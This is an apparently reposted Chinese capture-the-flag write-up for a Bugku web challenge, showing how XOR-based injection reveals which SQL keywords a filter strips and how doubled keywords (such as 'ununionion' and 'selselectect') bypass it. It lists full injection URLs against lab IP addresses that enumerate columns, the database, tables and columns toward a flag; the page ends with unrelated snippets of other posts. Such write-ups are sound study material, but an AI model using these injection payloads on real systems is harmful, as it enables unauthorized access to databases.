2. 程式人生 > >bugku-Web-多次(異或注入,判斷被過濾的關鍵字)

bugku-Web-多次(異或注入,判斷被過濾的關鍵字)

阿新 發佈:2018-12-17

進去看到url感覺是sql注入,

加上',報錯但是%23不報錯,加上'--+,也不報錯,說明可以用--+註釋
加上' or 1=1--+,報錯
嘗試' oorr 1=1--+,正常
說明or被過濾了.

那麼怎麼判斷哪些關鍵字被過濾了呢,這裡用到異或注入(同真異假)。

http://120.24.86.145:9004/1ndex.php?id=1'^(length('union')!=0)--+

如果返回正常說明union被過濾了。

這樣嘗試出來被過濾的關鍵字:union、select、and、or、(order、information中含or)

由最上面知道雙寫可以繞過過濾
 

猜欄位數
http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 2 --+ 正常
http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 3 --+ 報錯
暴庫:
id=-1' ununionion selselectect 1,batabase()--+

web1002-1
暴表:123.206.87.240:9004/1ndex.php?id=-1' ununionion selselectect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema='web1002-1'--+

flag1
 
爆列名:
123.206.87.240:9004/1ndex.php?id=-1' ununionion selselectect 1,group_concat(column_name) from infoorrmation_schema.columns where table_name='flag1'--+


flag1,address

下一階段如果爆出flag1,會出來一串字元

嘗試爆出address的話出現下一關地址,進入下一關

 

相關推薦

bugku-Web-(注入判斷過濾關鍵字)

進去看到url感覺是sql注入, 加上',報錯但是%23不報錯,加上'--+,也不報錯,說明可以用--+註釋 加上' or 1=1--+,報錯 嘗試' oorr 1=1--+,正常 說明or被過濾了. 那麼怎麼判斷哪些關鍵字被過濾了呢,這裡用到異或注入(同真異假)。 http://1

bugku中的注入updatexml報錯注入union過濾和locate繞過布林盲注)writeup

首先我們判斷一下是什麼注入型別 注意輸入的是英文字元',中文不會轉變為%27,報錯,說明是字元注入 這時候我們就要判斷一下SQL網站過濾了什麼內容,我們可以使用異或注入來判斷哪些字串被過濾掉了 http://120.24.86.145:9004/1ndex.ph

遠端oracle使用者輸入錯誤密碼後使用者鎖定

以linux下的作業系統為例 1.登入遠端伺服器 2. 登入到Linux後,就可以在命令視窗直接對Linux進行操作了。 這裡我們先將使用者切換到Oracle。當顯示為[[email protected] ~]$ 時,說明切換成功。 命令:su - ora

bugku中的題目以及學到的注入

首先我們判斷一下是什麼注入型別 注意輸入的是英文字元',中文不會轉變為%27,報錯,說明是字元注入 這時候我們就要判斷一下SQL網站過濾了什麼內容,我們可以使用異或注入來判斷哪些字串被過濾掉了 http://120.24.86.145:9004/1ndex.php?i

input屬性type為file打開文件資源管理器時如何限制選取只能一選取的行為

esc image object ttr itl 文件 ctu 轉化 idt 1、input標簽沒有設置multiple屬性,文件資源管理器默認一次選取 <!doctype html> <html lang="en"> <head>

探索大神科比,30000投籃數據有好玩的發現

Python 編程語言 Python爬蟲 數據分析 粉絲獨白籃球巨星科比,是NBA歷史上最佳得分手之一,以前寫了一篇關於科比的得分數據分析。這一次,讓我們聚焦於進攻方式,用數據來探索科比職業生涯的打球方式,看看如何防守才能最大化阻礙科比的進攻!要點:數據獲取數據的清洗數據的多維度可視化01:數

為什麽三操作可以交換兩個數

找到 原來 們的 異或操作 去掉 進制 ont 交換兩個數 一位 a和b是兩個整數,經過以下三次異或操作,可以達到交換目的:a = a ^ b;b = a ^ b;a = a ^ b; 首先要理解,什麽是^(異或)操作:  二進制兩數運算結果:  0 ^ 0 = 0  

關於解決接收相同條件如何只執行一if條件語句的簡單問題

  public class FacesSet { private static FacesSet instance = null; private Set<String> faceNames = new HashSet<String>();

窮舉所有資料

Description averyboy是一個非常男孩,這一天他來到薈園吃午飯,買飯之前,食堂阿姨給了他一個問題。如果他能解決這個問題,食堂阿姨將會給他一個免費午餐。由於averyboy沒吃飯,解決不了這個問題,但是他又想得到免費的午餐。現在他正向你求助,你能幫助他嗎?食堂阿姨所給的問題如下:薈

在搭建Hadoop 分散式叢集的時候格式化檔案系統啟動hdfs,yarn後jps 發現datanode為啟動

可以參考:https://www.cnblogs.com/dxwhut/p/5679501.html https://blog.csdn.net/baidu_15113429/article/details/53739734 https://www.cnblogs.com/lishpei/p

防止使用者連續擊鍵呼叫ajax時即防抖的封裝

在文字框中常常有這樣的需求,鍵入值時,實時呼叫相應的介面,但是每次觸發keydown都觸發,會嚴重消耗網頁的效能 基於此,可以進行封裝,設定鍵入值得間隔在一秒之內只調用一次,程式碼如下 呼叫如下 $("input").on("keydown",debounce(fu

Azure: Web App 構建網站API適合單體式應用

簡介 使用Web App服務,使用者只需要上傳程式碼到Web App裡面,不需要管理底層的作業系統,就可以很輕鬆地部署一個網站。Web App更加專注於網站或API,適合單體應用,如果要部署比較複雜的應用的話,應該將其微服務化,使用AKS或Service Fabric微服務平臺。Web App最

leetcode_461. Hamming Distance 計算漢明距離按位運算計算整數的二進位制表示中1的個數 java

題目: The Hamming distance between two integers is the number of positions at which the corresponding bits are different. Given two int

位與&|^運算以及運用場景

一.按位與運算子 參加運算的兩個資料,按二進位制位進行位與運算.          例如:3&5          先將兩個資料轉化為二進位制數,然後按位進行與運算,同為1結果為1,其它情況結

HDU5833(2016CCPC網賽)——Zhu and 772002(方程組素數分解)

Zhu and 772002 Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/65536 K (Java/Others) Total Submission(s): 510    Accepted

通過jquery load在list頁面載入詳情頁導致的form校驗以及提交問題

業務需求:現做微信端支付的東西(bla),業務需求很清晰,可是開發需求領導已經規定了,大致描述速下: 使用者登陸之後進入到未支付訂單的列表頁list,在list頁中採用jquery load,將所有的訂單明細頁面列出,並且在本頁面中可以支付; 剖析:pc端原

登錄失敗用戶鎖定及使用Pam_Tally2解鎖

服務器 字段 分享圖片 all flag 了解 日誌文件 小寫 crack 在linux系統中,用戶多次登錄失敗會被鎖定,一段時間內將不能再登錄系統,這是一般會用到Pam_Tally2進行賬戶解鎖。 了解PAM Linux-PAM (Pluggable Authentica

小程式js判斷變數(Undefined String Array Object)是否為空

關鍵程式碼 function isBlank(str){ if (Object.prototype.toString.call(str) ==='[object Undefined]'){//

如何實現新增多條資訊到GridView中而一儲存到資料庫頁面重新整理而丟失資料呢?

前面我們提到了,如果想要一次將從TextBox資訊新增到GridView的幾行資料記錄新增到資料庫中,我們在設計ASP.NET的頁面時,建議採用AJAX技術,進行區域性資料重新整理。 如圖所示:【建議在IE瀏覽器下執行】以下都是控制元件的拖動,大家都懂的。 另外,在pro

web 開發,個人中心每個請求判斷使用者是否登入若沒有登入則跳轉到登入頁面登入成功後返回之前頁面

首先要在web.xml裡面配製一個usercenter過濾器,當用戶請求中包含http.../usercenter/..如下時,則會執行userCenterFilter過濾器,判斷使用者是否登入,若沒有登入,則通過req.getRequestURI();獲得請求路徑,通過r